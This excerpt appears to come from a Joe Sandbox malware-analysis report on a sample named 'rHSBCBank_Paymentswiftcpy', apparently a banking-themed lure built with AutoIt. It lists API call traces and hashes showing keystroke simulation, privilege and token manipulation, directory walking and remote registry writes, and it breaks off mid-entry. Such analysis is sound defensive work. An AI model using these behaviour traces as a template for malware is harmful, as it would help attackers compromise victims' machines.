                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getptd_noexit__lock_file
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2597487223-0
                                                                                                                                • Opcode ID: 6dafacd068ed9d70579a6d235c22d071613570da06ecd7c578244cdbbd3cb1d9
                                                                                                                                • Instruction ID: 971183d1371e71fe397cc4d6d0bc540be02ce8f5f84b09f0dca3ad62aa3997f2
                                                                                                                                • Opcode Fuzzy Hash: 6dafacd068ed9d70579a6d235c22d071613570da06ecd7c578244cdbbd3cb1d9
                                                                                                                                • Instruction Fuzzy Hash: E8F0CD71901649EBDF51AFB48C0E7EE36A4EF02325F158414F424AA292CBBC9A51EF52
                                                                                                                                APIs
                                                                                                                                • FreeLibrary.KERNEL32(?,?,007E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00724E7E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeLibrary
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                • Opcode ID: 4ce499c41b806fc7d0288b8af1235d218b2244fd2d472a141229ac79f8c911c1
                                                                                                                                • Instruction ID: b58b608795ae723cb0b4c77c348d5881117360109fa07e24db9bef7800e3c05e
                                                                                                                                • Opcode Fuzzy Hash: 4ce499c41b806fc7d0288b8af1235d218b2244fd2d472a141229ac79f8c911c1
                                                                                                                                • Instruction Fuzzy Hash: 25F03971901721DFEB349F64E494812BBE1BF543293218A3EE2D682620C73A9880DF40
                                                                                                                                APIs
                                                                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007407B0
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LongNamePath_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2514874351-0
                                                                                                                                • Opcode ID: d996296bcc95d46d488729269a4093839d06bb9761a5830b55619a407c540892
                                                                                                                                • Instruction ID: 00e6c2819ecb5377d022596d898b45a1c63caab4c2ce78e30fd29075f95fddc6
                                                                                                                                • Opcode Fuzzy Hash: d996296bcc95d46d488729269a4093839d06bb9761a5830b55619a407c540892
                                                                                                                                • Instruction Fuzzy Hash: 37E0CD769051285BC720D6989C09FEA77DDEFC97A1F0441B5FC0CD7254D9A4AC8086D0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __wfsopen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 197181222-0
                                                                                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                • Instruction ID: c281e31fa6468f0370b3be672687effa3ab77d10d2f18ad829591410af1d8b9b
                                                                                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                • Instruction Fuzzy Hash: 93B092B644020CB7CE012A82EC02A493B19AB41764F408021FB0C18162A6B7A6649A89
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                • Instruction ID: aa2bf1930eddcf8655d7b0ab54bfaa3fcf9cbce96e1b3f524a715343ac081de0
                                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                • Instruction Fuzzy Hash: CA31A070A00105DBC718DF58D4C4AA9F7B6FB99300B6486A5E90ACB355DB35EDC1EBE0
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 01F822B1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                • Instruction ID: 9bd4cca6622812f4062439cb4a0fb7d39a7a3d65c57acb1b8186730a5111c175
                                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                • Instruction Fuzzy Hash: 82E0E67494010EDFDB00EFB8D54969E7FB4EF04301F100161FD01D2281D6319D50CA72
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623
                                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007ACB37
                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007ACB95
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007ACBD6
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007ACC00
                                                                                                                                • SendMessageW.USER32 ref: 007ACC29
                                                                                                                                • _wcsncpy.LIBCMT ref: 007ACC95
                                                                                                                                • GetKeyState.USER32(00000011), ref: 007ACCB6
                                                                                                                                • GetKeyState.USER32(00000009), ref: 007ACCC3
                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007ACCD9
                                                                                                                                • GetKeyState.USER32(00000010), ref: 007ACCE3
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007ACD0C
                                                                                                                                • SendMessageW.USER32 ref: 007ACD33
                                                                                                                                • SendMessageW.USER32(?,00001030,?,007AB348), ref: 007ACE37
                                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007ACE4D
                                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007ACE60
                                                                                                                                • SetCapture.USER32(?), ref: 007ACE69
                                                                                                                                • ClientToScreen.USER32(?,?), ref: 007ACECE
                                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007ACEDB
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007ACEF5
                                                                                                                                • ReleaseCapture.USER32 ref: 007ACF00
                                                                                                                                • GetCursorPos.USER32(?), ref: 007ACF3A
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 007ACF47
                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007ACFA3
                                                                                                                                • SendMessageW.USER32 ref: 007ACFD1
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007AD00E
                                                                                                                                • SendMessageW.USER32 ref: 007AD03D
                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007AD05E
                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007AD06D
                                                                                                                                • GetCursorPos.USER32(?), ref: 007AD08D
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 007AD09A
                                                                                                                                • GetParent.USER32(?), ref: 007AD0BA
                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007AD123
                                                                                                                                • SendMessageW.USER32 ref: 007AD154
                                                                                                                                • ClientToScreen.USER32(?,?), ref: 007AD1B2
                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007AD1E2
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007AD20C
                                                                                                                                • SendMessageW.USER32 ref: 007AD22F
                                                                                                                                • ClientToScreen.USER32(?,?), ref: 007AD281
                                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007AD2B5
                                                                                                                                  • Part of subcall function 007225DB: GetWindowLongW.USER32(?,000000EB), ref: 007225EC
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007AD351
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                • String ID: @GUI_DRAGID$F$pb~
                                                                                                                                • API String ID: 3977979337-3050743794
                                                                                                                                • Opcode ID: 34b0f2391d07aa0a7e20c60964faf453f7907629eb4039e9245d2ddd630d804b
                                                                                                                                • Instruction ID: 27d4e3264d7631bafbd3d2af3f68685176f3919dca27e96e7f196150b0a83997
                                                                                                                                • Opcode Fuzzy Hash: 34b0f2391d07aa0a7e20c60964faf453f7907629eb4039e9245d2ddd630d804b
                                                                                                                                • Instruction Fuzzy Hash: AB42AF74204280EFDB25CF64C888BAABBE5FF8A314F144619F565872B1C739DC50DBA6
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$_memset
                                                                                                                                • String ID: ]}$3cs$DEFINE$P\}$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_s
                                                                                                                                • API String ID: 1357608183-3017454739
                                                                                                                                • Opcode ID: 26654ad50f92ec171f00547bfbe0190eefbf17b89ed6d8dacd836f2106cd21f9
                                                                                                                                • Instruction ID: c13fc5d2a6ecb38c989e7592e2bde09b97ee6765bbccf3ce95f2538be185b038
                                                                                                                                • Opcode Fuzzy Hash: 26654ad50f92ec171f00547bfbe0190eefbf17b89ed6d8dacd836f2106cd21f9
                                                                                                                                • Instruction Fuzzy Hash: 0893B471A00219DFDF28CF58C881BADB7B1FF48350F25C16AE959AB281E7789D81DB50
                                                                                                                                APIs
                                                                                                                                • GetForegroundWindow.USER32(00000000,?), ref: 007248DF
                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0075D665
                                                                                                                                • IsIconic.USER32(?), ref: 0075D66E
                                                                                                                                • ShowWindow.USER32(?,00000009), ref: 0075D67B
                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0075D685
                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0075D69B
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0075D6A2
                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0075D6AE
                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0075D6BF
                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0075D6C7
                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 0075D6CF
                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0075D6D2
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075D6E7
                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0075D6F2
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075D6FC
                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0075D701
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075D70A
                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0075D70F
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075D719
                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0075D71E
                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0075D721
                                                                                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0075D748
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                                • Opcode ID: a2b4c779d43fb32e16446bf8b31607af77205523ebc4c9efbc9b8f7732e6cce8
                                                                                                                                • Instruction ID: 5a865aa862253fd5f67b470102d558b2db5b270bc985474e439bdd18780fe76c
                                                                                                                                • Opcode Fuzzy Hash: a2b4c779d43fb32e16446bf8b31607af77205523ebc4c9efbc9b8f7732e6cce8
                                                                                                                                • Instruction Fuzzy Hash: A1319571A40318BBEB305FA19C49FBF3E6CEB85B51F104025FA04EA1D1C6B45D11ABA5
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 007787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077882B
                                                                                                                                  • Part of subcall function 007787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00778858
                                                                                                                                  • Part of subcall function 007787E1: GetLastError.KERNEL32 ref: 00778865
                                                                                                                                • _memset.LIBCMT ref: 00778353
                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007783A5
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 007783B6
                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007783CD
                                                                                                                                • GetProcessWindowStation.USER32 ref: 007783E6
                                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 007783F0
                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0077840A
                                                                                                                                  • Part of subcall function 007781CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00778309), ref: 007781E0
                                                                                                                                  • Part of subcall function 007781CB: CloseHandle.KERNEL32(?,?,00778309), ref: 007781F2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                • String ID: $default$winsta0
                                                                                                                                • API String ID: 2063423040-1027155976
                                                                                                                                • Opcode ID: b37d9db67e1b46f5fc5998d2584d9cc6daf08b1f5f27e81e7aad934eb7b21271
                                                                                                                                • Instruction ID: b7daf255628435ca3333831cc587c24f26d83c05904095ee47e019514bd2c122
                                                                                                                                • Opcode Fuzzy Hash: b37d9db67e1b46f5fc5998d2584d9cc6daf08b1f5f27e81e7aad934eb7b21271
                                                                                                                                • Instruction Fuzzy Hash: 1F818D71940209EFDF51DFA4CC49AEE7B79FF04384F248169F918A2261DB398E24DB21
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0078C78D
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078C7E1
                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0078C806
                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0078C81D
                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0078C844
                                                                                                                                • __swprintf.LIBCMT ref: 0078C890
                                                                                                                                • __swprintf.LIBCMT ref: 0078C8D3
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                • __swprintf.LIBCMT ref: 0078C927
                                                                                                                                  • Part of subcall function 00743698: __woutput_l.LIBCMT ref: 007436F1
                                                                                                                                • __swprintf.LIBCMT ref: 0078C975
                                                                                                                                  • Part of subcall function 00743698: __flsbuf.LIBCMT ref: 00743713
                                                                                                                                  • Part of subcall function 00743698: __flsbuf.LIBCMT ref: 0074372B
                                                                                                                                • __swprintf.LIBCMT ref: 0078C9C4
                                                                                                                                • __swprintf.LIBCMT ref: 0078CA13
                                                                                                                                • __swprintf.LIBCMT ref: 0078CA62
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                • API String ID: 3953360268-2428617273
                                                                                                                                • Opcode ID: 1ae4501f25c7ac80931181d6d4fd67d7e5bc40f8533f4482e61f951e620856e9
                                                                                                                                • Instruction ID: ba3f7cc1c2fe3f0cd2b6bf35acbf8028d78e7e13312dfd07120fc3c507618d4a
                                                                                                                                • Opcode Fuzzy Hash: 1ae4501f25c7ac80931181d6d4fd67d7e5bc40f8533f4482e61f951e620856e9
                                                                                                                                • Instruction Fuzzy Hash: B3A13BB1508355EBC744EBA4D889DAFB7ECFF85700F44491AF585C6191EA38EA08CB62
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0078EFB6
                                                                                                                                • _wcscmp.LIBCMT ref: 0078EFCB
                                                                                                                                • _wcscmp.LIBCMT ref: 0078EFE2
                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0078EFF4
                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 0078F00E
                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0078F026
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078F031
                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0078F04D
                                                                                                                                • _wcscmp.LIBCMT ref: 0078F074
                                                                                                                                • _wcscmp.LIBCMT ref: 0078F08B
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0078F09D
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(007D8920), ref: 0078F0BB
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0078F0C5
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078F0D2
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078F0E4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 1803514871-438819550
                                                                                                                                • Opcode ID: 4d55ce47bf625e282e4e82e4110080dd4728dba26eb8981032b37da6921e34ff
                                                                                                                                • Instruction ID: 7349fc3bd5f4ad95788c5113dd8f8068514cc64a27d92c12ca38b53c990fade9
                                                                                                                                • Opcode Fuzzy Hash: 4d55ce47bf625e282e4e82e4110080dd4728dba26eb8981032b37da6921e34ff
                                                                                                                                • Instruction Fuzzy Hash: 6431D532541218AEDB14EFF4DC48BEEB7ACAF89360F104276E844E2191DB78DE44CB65
                                                                                                                                APIs
                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007A0953
                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,007AF910,00000000,?,00000000,?,?), ref: 007A09C1
                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007A0A09
                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007A0A92
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 007A0DB2
                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 007A0DBF
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                • API String ID: 536824911-966354055
                                                                                                                                • Opcode ID: 62f4728737e2b0314c353535b9ad08e91fd7a8d78fb236d92e76f08855711f05
                                                                                                                                • Instruction ID: 6497ae85d410480ccb5470f5a356b5ecc1cf75452cddf73a65d12165ed212309
